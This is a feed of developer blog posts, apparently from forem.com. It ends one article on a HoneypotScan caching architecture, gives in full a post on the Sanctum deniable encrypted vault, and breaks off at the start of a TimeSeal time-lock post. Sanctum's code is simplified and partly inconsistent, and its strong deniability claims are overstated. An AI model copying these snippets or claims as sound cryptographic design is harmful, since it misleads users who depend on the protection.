class="nx">a</span><span class="p">.</span><span class="nx">download</span> <span class="o">=</span> <span class="s2">`honeypot-scan-</span><span class="p">${</span><span class="nx">result</span><span class="p">.</span><span class="nx">address</span><span class="p">}</span><span class="s2">.json`</span><span class="p">;</span> <span class="nx">a</span><span class="p">.</span><span class="nf">click</span><span class="p">();</span> <span class="p">}</span> </code></pre> </div> <h2> Performance Optimizations </h2> <h3> 1. Parallel Pattern Matching </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">const</span> <span class="nx">matches</span> <span class="o">=</span> <span class="k">await</span> <span class="nb">Promise</span><span class="p">.</span><span class="nf">all</span><span class="p">(</span> <span class="nx">patterns</span><span class="p">.</span><span class="nf">map</span><span class="p">(</span><span class="k">async </span><span class="p">(</span><span class="nx">pattern</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">({</span> <span class="na">pattern</span><span class="p">:</span> <span class="nx">pattern</span><span class="p">.</span><span class="nx">name</span><span class="p">,</span> <span class="na">matched</span><span class="p">:</span> <span class="nx">pattern</span><span class="p">.</span><span class="nx">regex</span><span class="p">.</span><span class="nf">test</span><span class="p">(</span><span class="nx">sourceCode</span><span class="p">),</span> <span class="p">}))</span> <span class="p">);</span> </code></pre> </div> <h3> 2. Early Exit on Cache Hit </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Check cache before any processing</span> <span class="kd">const</span> <span class="nx">cached</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">env</span><span class="p">.</span><span class="nx">HONEYPOT_CACHE</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nx">address</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">cached</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="k">new</span> <span class="nc">Response</span><span class="p">(</span><span class="nx">cached</span><span class="p">,</span> <span class="p">{</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/json</span><span class="dl">'</span> <span class="p">},</span> <span class="p">});</span> <span class="p">}</span> </code></pre> </div> <h3> 3. Lazy Loading Components </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">const</span> <span class="nx">ScanHistory</span> <span class="o">=</span> <span class="nf">dynamic</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="k">import</span><span class="p">(</span><span class="dl">'</span><span class="s1">./ScanHistory</span><span class="dl">'</span><span class="p">),</span> <span class="p">{</span> <span class="na">ssr</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span> <span class="na">loading</span><span class="p">:</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="o">&lt;</span><span class="nx">Skeleton</span> <span class="o">/&gt;</span><span class="p">,</span> <span class="p">});</span> </code></pre> </div> <h2> Deployment </h2> <h3> Cloudflare Workers </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Install Wrangler CLI</span> npm <span class="nb">install</span> <span class="nt">-g</span> wrangler <span class="c"># Login to Cloudflare</span> wrangler login <span class="c"># Deploy</span> wrangler deploy </code></pre> </div> <h3> Environment Variables </h3> <div class="highlight js-code-highlight"> <pre class="highlight toml"><code><span class="c"># wrangler.toml</span> <span class="py">name</span> <span class="p">=</span> <span class="s">"honeypotscan-api"</span> <span class="py">main</span> <span class="p">=</span> <span class="s">"src/worker.ts"</span> <span class="py">compatibility_date</span> <span class="p">=</span> <span class="s">"2024-01-01"</span> <span class="nn">[[kv_namespaces]]</span> <span class="py">binding</span> <span class="p">=</span> <span class="s">"HONEYPOT_CACHE"</span> <span class="py">id</span> <span class="p">=</span> <span class="s">"your-kv-namespace-id"</span> <span class="nn">[vars]</span> <span class="py">ETHERSCAN_API_KEY_1</span> <span class="p">=</span> <span class="s">"your-key-1"</span> <span class="py">ETHERSCAN_API_KEY_2</span> <span class="p">=</span> <span class="s">"your-key-2"</span> <span class="c"># ... more keys</span> </code></pre> </div> <h3> Cloudflare Pages </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Build Next.js app</span> npm run build <span class="c"># Deploy to Pages</span> npx wrangler pages deploy out </code></pre> </div> <h2> Lessons Learned </h2> <h3> What Worked Well </h3> <p>✅ <strong>KV caching is magic</strong> - 95% hit rate = massive cost savings<br><br> ✅ <strong>Edge computing eliminates latency issues</strong> - Consistent 2s response times globally<br><br> ✅ <strong>Pattern-based detection is fast</strong> - Regex matching takes &lt;100ms<br><br> ✅ <strong>Immutable contracts = aggressive caching</strong> - No cache invalidation needed</p> <h3> Gotchas </h3> <p>❌ <strong>KV eventual consistency</strong> - Writes take ~60s to propagate globally<br><br> ❌ <strong>10ms CPU limit</strong> - Had to optimize regex patterns<br><br> ❌ <strong>No WebSocket support</strong> - Can't do real-time updates<br><br> ❌ <strong>Cold start on first deploy</strong> - Takes ~30s for global propagation</p> <h3> What I'd Do Differently </h3> <ul> <li>Add WebAssembly for faster pattern matching</li> <li>Implement machine learning for novel pattern detection</li> <li>Build a feedback loop to improve patterns over time</li> <li>Add support for more chains (BSC, Avalanche, etc.)</li> </ul> <h2> Results </h2> <ul> <li><strong>2 second average response time</strong></li> <li><strong>95% cache hit rate</strong></li> <li><strong>$0/month infrastructure cost</strong></li> <li><strong>2M scans/day capacity on free tier</strong></li> <li><strong>98% sensitivity, 97% specificity</strong></li> </ul> <h2> Try It Yourself </h2> <p>Live: <a href="https://honeypotscan.pages.dev" rel="noopener noreferrer">honeypotscan.pages.dev</a><br><br> Source: <a href="https://github.com/Teycir/honeypotscan" rel="noopener noreferrer">github.com/Teycir/honeypotscan</a></p> <p>The entire stack is open source. Feel free to fork, modify, or use it as a reference for your own edge computing projects.</p> <h2> Conclusion </h2> <p>Cloudflare Workers + KV is perfect for:</p> <ul> <li>High read, low write workloads</li> <li>Global low-latency requirements</li> <li>Projects that need to start free and scale</li> <li>Immutable data (aggressive caching)</li> </ul> <p>For HoneypotScan, it's been the ideal architecture. Fast, free, and I haven't thought about infrastructure once since deploying.</p> <p>Questions? Drop them in the comments! 👇</p> smartcontract honeypot scams solidity Teycir Ben Soltane Thu, 08 Jan 2026 23:03:43 +0000 https://forem.com/teycir/sanctum-cryptographically-deniable-vault-system-with-ipfs-storage-320h https://forem.com/teycir/sanctum-cryptographically-deniable-vault-system-with-ipfs-storage-320h <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwc5tbqsmpcmlck2kilg3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwc5tbqsmpcmlck2kilg3.png" alt=" " width="800" height="634"></a></p> <h1> 🔒 Sanctum: When "I Don't Know the Password" Is Actually True </h1> <p>Ever heard of the <a href="https://xkcd.com/538/" rel="noopener noreferrer">$5 wrench attack</a>? It's the oldest vulnerability in cryptography: physical coercion. Your encryption might be unbreakable, but you're not. <strong>Sanctum</strong> solves this with cryptographically sound plausible deniability.</p> <h2> 🎭 The Problem: Encryption Isn't Enough </h2> <p>Traditional encrypted storage has a fatal flaw:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Attacker: "Give me the password or else." You: "I don't have one." Attacker: *checks encrypted file* "This is clearly encrypted. Try again." </code></pre> </div> <p>You can't prove the absence of data. Until now.</p> <h2> ✨ The Solution: Cryptographic Deniability </h2> <p>Sanctum creates <strong>three indistinguishable layers</strong>:</p> <ol> <li> <strong>Decoy Layer</strong> - Innocent content (family photos, small wallet with $200)</li> <li> <strong>Hidden Layer</strong> - Real secrets (whistleblower docs, main crypto wallet)</li> <li> <strong>Panic Layer</strong> - Shows "vault deleted" under duress</li> </ol> <p><strong>The magic?</strong> All three are cryptographically identical. An adversary cannot prove which layer is real or if hidden layers exist.</p> <h2> 🏗️ Architecture: Zero-Trust by Design </h2> <h3> Client-Side Encryption Flow </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// 1. User creates vault with decoy + hidden content</span> <span class="kd">const</span> <span class="nx">decoyBlob</span> <span class="o">=</span> <span class="nf">encrypt</span><span class="p">(</span><span class="nx">decoyContent</span><span class="p">,</span> <span class="dl">''</span><span class="p">);</span> <span class="c1">// Empty passphrase</span> <span class="kd">const</span> <span class="nx">hiddenBlob</span> <span class="o">=</span> <span class="nf">encrypt</span><span class="p">(</span><span class="nx">hiddenContent</span><span class="p">,</span> <span class="nf">deriveKey</span><span class="p">(</span><span class="nx">passphrase</span><span class="p">));</span> <span class="c1">// 2. XOR both layers (makes them indistinguishable)</span> <span class="kd">const</span> <span class="nx">combined</span> <span class="o">=</span> <span class="nf">xor</span><span class="p">(</span><span class="nx">decoyBlob</span><span class="p">,</span> <span class="nx">hiddenBlob</span><span class="p">);</span> <span class="c1">// 3. Upload to IPFS</span> <span class="kd">const</span> <span class="nx">decoyCID</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">ipfs</span><span class="p">.</span><span class="nf">upload</span><span class="p">(</span><span class="nx">decoyBlob</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">hiddenCID</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">ipfs</span><span class="p">.</span><span class="nf">upload</span><span class="p">(</span><span class="nx">hiddenBlob</span><span class="p">);</span> <span class="c1">// 4. Split-key architecture</span> <span class="kd">const</span> <span class="nx">keyA</span> <span class="o">=</span> <span class="nf">randomBytes</span><span class="p">(</span><span class="mi">32</span><span class="p">);</span> <span class="c1">// Stays in URL</span> <span class="kd">const</span> <span class="nx">keyB</span> <span class="o">=</span> <span class="nf">randomBytes</span><span class="p">(</span><span class="mi">32</span><span class="p">);</span> <span class="c1">// Encrypted in database</span> <span class="kd">const</span> <span class="nx">vaultURL</span> <span class="o">=</span> <span class="s2">`https://sanctumvault.online/unlock/</span><span class="p">${</span><span class="nx">vaultId</span><span class="p">}</span><span class="s2">#</span><span class="p">${</span><span class="nf">encode</span><span class="p">(</span><span class="nx">keyA</span><span class="p">)}</span><span class="s2">`</span><span class="p">;</span> </code></pre> </div> <h3> Tech Stack </h3> <ul> <li> <strong>Frontend</strong>: Next.js 15 + React + Web Crypto API</li> <li> <strong>Cryptography</strong>: XChaCha20-Poly1305 + Argon2id (256MB memory, 3 iterations)</li> <li> <strong>Storage</strong>: IPFS via Pinata/Filebase (free tiers)</li> <li> <strong>Database</strong>: Cloudflare D1 (split-key storage only)</li> <li> <strong>Hosting</strong>: Cloudflare Pages (static site)</li> </ul> <h3> Security Features </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// RAM-only storage (no disk persistence)</span> <span class="kd">class</span> <span class="nc">SecureStorage</span> <span class="p">{</span> <span class="k">private</span> <span class="nx">keys</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Map</span><span class="o">&lt;</span><span class="kr">string</span><span class="p">,</span> <span class="nb">Uint8Array</span><span class="o">&gt;</span><span class="p">();</span> <span class="nf">store</span><span class="p">(</span><span class="nx">key</span><span class="p">:</span> <span class="kr">string</span><span class="p">,</span> <span class="nx">value</span><span class="p">:</span> <span class="nb">Uint8Array</span><span class="p">):</span> <span class="k">void</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">keys</span><span class="p">.</span><span class="nf">set</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span> <span class="nx">value</span><span class="p">);</span> <span class="c1">// Auto-clear after 5 minutes</span> <span class="nf">setTimeout</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="k">this</span><span class="p">.</span><span class="nf">wipe</span><span class="p">(</span><span class="nx">key</span><span class="p">),</span> <span class="mi">300000</span><span class="p">);</span> <span class="p">}</span> <span class="nf">wipe</span><span class="p">(</span><span class="nx">key</span><span class="p">:</span> <span class="kr">string</span><span class="p">):</span> <span class="k">void</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">data</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">keys</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nx">key</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span> <span class="nx">data</span><span class="p">.</span><span class="nf">fill</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="c1">// Overwrite memory</span> <span class="k">this</span><span class="p">.</span><span class="nx">keys</span><span class="p">.</span><span class="k">delete</span><span class="p">(</span><span class="nx">key</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="c1">// Panic key: Double-press Escape</span> <span class="kd">let</span> <span class="nx">escapeCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">'</span><span class="s1">keydown</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">key</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">Escape</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="nx">escapeCount</span><span class="o">++</span><span class="p">;</span> <span class="k">if </span><span class="p">(</span><span class="nx">escapeCount</span> <span class="o">===</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span> <span class="nf">wipeAllKeys</span><span class="p">();</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">/</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span> <span class="nf">setTimeout</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="nx">escapeCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">500</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> </code></pre> </div> <h2> 🎯 Real-World Use Cases </h2> <h3> 1. Journalist Protecting Sources </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Decoy: Published articles, public research notes Hidden: Confidential source documents, whistleblower communications Scenario: Device seized at border → reveal decoy, sources stay protected </code></pre> </div> <h3> 2. Crypto Holder Under Duress </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Decoy: Small wallet with $200 ("this is all I have") Hidden: Main wallet with life savings Scenario: $5 wrench attack → hand over decoy wallet, real funds stay safe </code></pre> </div> <h3> 3. Activist in Authoritarian Regime </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Decoy: Personal photos, innocuous social media content Hidden: Protest coordination plans, evidence of government abuse Scenario: Police raid → show decoy layer, cannot prove hidden content exists </code></pre> </div> <h2> 🛡️ Attack Resistance </h2> <h3> Physical Duress </h3> <p><strong>Attack</strong>: Coerced to reveal passphrase<br><br> <strong>Defense</strong>: Reveal decoy passphrase. Adversary cannot prove hidden layer exists.</p> <h3> Disk Forensics </h3> <p><strong>Attack</strong>: Device seized, disk analysis performed<br><br> <strong>Defense</strong>: RAM-only storage. Keys never written to disk. Auto-wiped on tab close.</p> <h3> Timing Analysis </h3> <p><strong>Attack</strong>: Measure decryption time to detect layers<br><br> <strong>Defense</strong>: Randomized 500-2000ms delay on all operations.</p> <h3> Blob Size Analysis </h3> <p><strong>Attack</strong>: Compare encrypted blob sizes<br><br> <strong>Defense</strong>: Padded to standard sizes (1KB, 10KB, 100KB, 1MB, 10MB, 25MB).</p> <h3> Brute Force </h3> <p><strong>Attack</strong>: Try all possible passphrases<br><br> <strong>Defense</strong>: Argon2id with 256MB memory makes brute-force computationally infeasible.</p> <h2> 🚀 Quick Start </h2> <h3> For Users </h3> <ol> <li>Visit <a href="https://sanctumvault.online" rel="noopener noreferrer">sanctumvault.online</a> </li> <li>Configure Pinata or Filebase (free IPFS providers)</li> <li>Create vault with optional decoy content</li> <li>Set passphrase for hidden layer</li> <li>Share the link - only you know the passphrase</li> </ol> <h3> For Developers </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Clone repository</span> git clone https://github.com/Teycir/Sanctum.git <span class="nb">cd </span>Sanctum <span class="c"># Install dependencies</span> npm <span class="nb">install</span> <span class="c"># Run development server</span> npm run dev </code></pre> </div> <h2> 🔬 Technical Deep Dive </h2> <h3> Why XChaCha20-Poly1305? </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// AES-GCM: 96-bit nonce (collision risk after 2^48 encryptions)</span> <span class="c1">// XChaCha20: 192-bit nonce (collision risk after 2^96 encryptions)</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">xchacha20poly1305</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@noble/ciphers/chacha</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="kd">function</span> <span class="nf">encrypt</span><span class="p">(</span> <span class="nx">plaintext</span><span class="p">:</span> <span class="nb">Uint8Array</span><span class="p">,</span> <span class="nx">key</span><span class="p">:</span> <span class="nb">Uint8Array</span> <span class="p">):</span> <span class="nx">EncryptionResult</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">nonce</span> <span class="o">=</span> <span class="nf">randomBytes</span><span class="p">(</span><span class="mi">24</span><span class="p">);</span> <span class="c1">// 192-bit nonce</span> <span class="kd">const</span> <span class="nx">cipher</span> <span class="o">=</span> <span class="nf">xchacha20poly1305</span><span class="p">(</span><span class="nx">key</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">ciphertext</span> <span class="o">=</span> <span class="nx">cipher</span><span class="p">.</span><span class="nf">encrypt</span><span class="p">(</span><span class="nx">plaintext</span><span class="p">);</span> <span class="k">return</span> <span class="p">{</span> <span class="nx">ciphertext</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">,</span> <span class="na">authTag</span><span class="p">:</span> <span class="nx">ciphertext</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="o">-</span><span class="mi">16</span><span class="p">)</span> <span class="c1">// Authenticated encryption</span> <span class="p">};</span> <span class="p">}</span> </code></pre> </div> <h3> Split-Key Architecture </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// KeyA: Stays in URL fragment (never sent to server)</span> <span class="c1">// KeyB: Encrypted in database with vault-specific key</span> <span class="kd">const</span> <span class="nx">vaultKey</span> <span class="o">=</span> <span class="nf">deriveKey</span><span class="p">(</span><span class="nx">vaultId</span> <span class="o">+</span> <span class="nx">salt</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">encryptedKeyB</span> <span class="o">=</span> <span class="nf">encrypt</span><span class="p">(</span><span class="nx">keyB</span><span class="p">,</span> <span class="nx">vaultKey</span><span class="p">);</span> <span class="c1">// To decrypt IPFS CIDs:</span> <span class="kd">const</span> <span class="nx">masterKey</span> <span class="o">=</span> <span class="nf">xor</span><span class="p">(</span><span class="nx">keyA</span><span class="p">,</span> <span class="nx">keyB</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">decoyCID</span> <span class="o">=</span> <span class="nf">decrypt</span><span class="p">(</span><span class="nx">encryptedDecoyCID</span><span class="p">,</span> <span class="nx">masterKey</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">hiddenCID</span> <span class="o">=</span> <span class="nf">decrypt</span><span class="p">(</span><span class="nx">encryptedHiddenCID</span><span class="p">,</span> <span class="nx">masterKey</span><span class="p">);</span> </code></pre> </div> <h3> 30-Day Grace Period </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Two-stage cleanup prevents accidental data loss</span> <span class="c1">// Stage 1: Soft delete (mark inactive)</span> <span class="nx">UPDATE</span> <span class="nx">vaults</span> <span class="nx">SET</span> <span class="nx">is_active</span> <span class="o">=</span> <span class="mi">0</span> <span class="nx">WHERE</span> <span class="nx">expires_at</span> <span class="o">&lt;</span> <span class="nc">NOW</span><span class="p">();</span> <span class="c1">// Stage 2: Hard delete (30 days later)</span> <span class="nx">DELETE</span> <span class="nx">FROM</span> <span class="nx">vaults</span> <span class="nx">WHERE</span> <span class="nx">is_active</span> <span class="o">=</span> <span class="mi">0</span> <span class="nx">AND</span> <span class="nx">expires_at</span> <span class="o">&lt;</span> <span class="nc">NOW</span><span class="p">()</span> <span class="o">-</span> <span class="nx">INTERVAL</span> <span class="mi">30</span> <span class="nx">DAYS</span><span class="p">;</span> </code></pre> </div> <h2> 📊 Test Coverage </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npm <span class="nb">test</span> <span class="c"># Results:</span> <span class="c"># Test Suites: 19 passed, 19 total</span> <span class="c"># Tests: 115 passed, 115 total</span> <span class="c"># Coverage: Core crypto, duress layers, storage, vault expiry</span> </code></pre> </div> <h2> 🔐 OpSec Best Practices </h2> <ol> <li> <strong>Fund decoy realistically</strong> - $50-500 matching your financial status</li> <li> <strong>Memorize passphrases</strong> - 12+ chars (uppercase, lowercase, number, special)</li> <li> <strong>Use Tor Browser</strong> - Hides IP, defeats timing attacks</li> <li> <strong>Test before trusting</strong> - Verify decoy unlocks, practice plausible deniability</li> <li> <strong>Store links securely</strong> - Password manager (KeePassXC/Bitwarden)</li> <li> <strong>Never reveal hidden layers</strong> - Act natural, claim "this is all I have"</li> </ol> <h2> 🐦 Warrant Canary </h2> <p>Sanctum includes a live warrant canary at <a href="https://sanctumvault.online/canary" rel="noopener noreferrer">sanctumvault.online/canary</a>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>✅ NOT received any: - National Security Letters (NSLs) - FISA court orders - Gag orders - Requests to implement backdoors ✅ Architecture guarantees: - Zero-knowledge: Cannot decrypt user vaults - No user logs: No IP addresses or metadata - No backdoors: All code is open-source - RAM-only: No persistent storage of keys </code></pre> </div> <h2> 🌐 Why IPFS? </h2> <p>Traditional cloud storage has single points of failure:</p> <ul> <li> <strong>Centralized</strong>: Provider can be compelled to hand over data</li> <li> <strong>Censorable</strong>: Governments can block access</li> <li> <strong>Deletable</strong>: Provider can delete your data</li> </ul> <p>IPFS provides:</p> <ul> <li> <strong>Decentralized</strong>: Data replicated across multiple nodes</li> <li> <strong>Censorship-resistant</strong>: Content-addressed (CID), not location-based</li> <li> <strong>Immutable</strong>: Once uploaded, cannot be modified</li> <li> <strong>Free</strong>: Pinata (1GB) + Filebase (5GB) free tiers</li> </ul> <h2> 🚫 What Sanctum Is NOT </h2> <ul> <li>❌ <strong>Not a password manager</strong> - Use KeePassXC/Bitwarden for that</li> <li>❌ <strong>Not a backup solution</strong> - IPFS data can be unpinned</li> <li>❌ <strong>Not a file sharing service</strong> - Links are permanent, no deletion</li> <li>❌ <strong>Not a VPN</strong> - Use Tor Browser for anonymity</li> </ul> <h2> 💡 Lessons Learned </h2> <h3> 1. RAM-Only Storage Is Hard </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// ❌ WRONG: localStorage persists to disk</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nf">setItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">key</span><span class="dl">'</span><span class="p">,</span> <span class="nf">encode</span><span class="p">(</span><span class="nx">key</span><span class="p">));</span> <span class="c1">// ✅ CORRECT: In-memory only</span> <span class="kd">const</span> <span class="nx">keyStore</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Map</span><span class="o">&lt;</span><span class="kr">string</span><span class="p">,</span> <span class="nb">Uint8Array</span><span class="o">&gt;</span><span class="p">();</span> </code></pre> </div> <h3> 2. Timing Attacks Are Real </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// ❌ WRONG: Instant response reveals wrong passphrase</span> <span class="k">if </span><span class="p">(</span><span class="nx">passphrase</span> <span class="o">!==</span> <span class="nx">correctPassphrase</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="p">{</span> <span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Invalid passphrase</span><span class="dl">'</span> <span class="p">};</span> <span class="p">}</span> <span class="c1">// ✅ CORRECT: Constant-time comparison + random delay</span> <span class="kd">const</span> <span class="nx">isValid</span> <span class="o">=</span> <span class="nf">timingSafeEqual</span><span class="p">(</span><span class="nf">hash</span><span class="p">(</span><span class="nx">passphrase</span><span class="p">),</span> <span class="nf">hash</span><span class="p">(</span><span class="nx">correctPassphrase</span><span class="p">));</span> <span class="k">await</span> <span class="nf">sleep</span><span class="p">(</span><span class="nf">randomInt</span><span class="p">(</span><span class="mi">500</span><span class="p">,</span> <span class="mi">2000</span><span class="p">));</span> <span class="k">return</span> <span class="nx">isValid</span> <span class="p">?</span> <span class="p">{</span> <span class="nx">data</span> <span class="p">}</span> <span class="p">:</span> <span class="p">{</span> <span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Invalid passphrase</span><span class="dl">'</span> <span class="p">};</span> </code></pre> </div> <h3> 3. Browser History Is a Leak </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Vault URLs contain KeyA in fragment</span> <span class="c1">// Must clear from browser history</span> <span class="k">if </span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">history</span><span class="p">.</span><span class="nx">replaceState</span><span class="p">)</span> <span class="p">{</span> <span class="nb">window</span><span class="p">.</span><span class="nx">history</span><span class="p">.</span><span class="nf">replaceState</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="dl">''</span><span class="p">,</span> <span class="dl">'</span><span class="s1">/unlock</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h2> 🔮 Future Roadmap </h2> <ul> <li>[ ] <strong>Shamir Secret Sharing</strong> - Split vault access across multiple people</li> <li>[ ] <strong>Dead Man's Switch</strong> - Auto-release after inactivity</li> <li>[ ] <strong>Steganography</strong> - Hide vault in innocent-looking images</li> <li>[ ] <strong>Hardware Key Support</strong> - YubiKey/Ledger integration</li> <li>[ ] <strong>Mobile Apps</strong> - iOS/Android with biometric unlock</li> </ul> <h2> 🙏 Acknowledgments </h2> <ul> <li> <strong>VeraCrypt</strong> - Inspiration for plausible deniability</li> <li> <strong>Cloudflare Pages</strong> - Free static site hosting</li> <li> <strong>Pinata/Filebase</strong> - Free IPFS pinning services</li> <li> <strong><a class="mentioned-user" href="https://dev.to/noble">@noble</a>/ciphers</strong> - Audited cryptography library</li> </ul> <h2> 📜 License </h2> <p>Business Source License 1.1 - Free for non-production use. Production use requires commercial license after 4 years.</p> <h2> 🔗 Links </h2> <ul> <li> <strong>Live Demo</strong>: <a href="https://sanctumvault.online" rel="noopener noreferrer">sanctumvault.online</a> </li> <li> <strong>GitHub</strong>: <a href="https://github.com/Teycir/Sanctum" rel="noopener noreferrer">github.com/Teycir/Sanctum</a> </li> <li> <strong>Video Demo</strong>: <a href="https://youtu.be/k54qKVYhcrM" rel="noopener noreferrer">YouTube</a> </li> <li> <strong>Contact</strong>: <a href="https://teycirbensoltane.tn" rel="noopener noreferrer">teycirbensoltane.tn</a> </li> </ul> <h2> 💬 Discussion </h2> <p>What do you think? Would you use cryptographic deniability for your sensitive data? What other use cases can you think of?</p> <p>Drop a comment below or open an issue on GitHub!</p> <p><strong>Built with ❤️ and 🔒 by <a href="https://teycirbensoltane.tn" rel="noopener noreferrer">Teycir Ben Soltane</a></strong></p> <p><em>Disclaimer: Sanctum is a tool for legitimate privacy needs. Users are responsible for complying with local laws. The developers do not condone illegal activities.</em></p> webdev programming security Teycir Ben Soltane Sat, 27 Dec 2025 15:33:34 +0000 https://forem.com/teycir/building-cryptographically-enforced-time-locked-vaults-on-cloudflares-edge-404e https://forem.com/teycir/building-cryptographically-enforced-time-locked-vaults-on-cloudflares-edge-404e <h1> Building Cryptographically Enforced Time-Locked Vaults on Cloudflare's Edge </h1> <p>Most "send a message to the future" apps have a fundamental problem: they rely on trust. The service promises not to peek at your content early, but there's no cryptographic enforcement. I built <a href="https://timeseal.online" rel="noopener noreferrer">TimeSeal</a> to solve this using split-key cryptography and edge computing.</p> <h2> The Core Problem </h2> <p>Traditional time-lock systems have three failure modes:</p> <ol> <li> <strong>Trust-based</strong>: Server promises not to decrypt early (no enforcement)</li> <li> <strong>Client-side</strong>: JavaScript countdown timers (trivially bypassed)</li> <li> <strong>Blockchain</strong>: High cost, complexity, and still requires oracle trust</li> </ol> <blockquote> <p>I wanted something different: <strong>mathematically impossible to decrypt early</strong>, even with full server access.</p> </blockquote> <h2> The Solution: Split-Key Architecture </h2> <p>TimeSeal uses a two-key system where no single party can decrypt the content:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Client-side: Generate two random keys</span> <span class="kd">const</span> <span class="nx">keyA</span> <span class="o">=</span> <span class="nx">crypto</span><span class="p">.</span><span class="nf">getRandomValues</span><span class="p">(</span><span class="k">new</span> <span class="nc">Uint8Array</span><span class="p">(</span><span class="mi">32</span><span class="p">));</span> <span class="c1">// Stays in browser</span> <span class="kd">const</span> <span class="nx">keyB</span> <span class="o">=</span> <span class="nx">crypto</span><span class="p">.</span><span class="nf">getRandomValues</span><span class="p">(</span><span class="k">new</span> <span class="nc">Uint8Array</span><span class="p">(</span><span class="mi">32</span><span class="p">));</span> <span class="c1">// Goes to server</span> <span class="c1">// Combine keys for encryption</span> <span class="kd">const</span> <span class="nx">combinedKey</span> <span class="o">=</span> <span class="k">await</span> <span 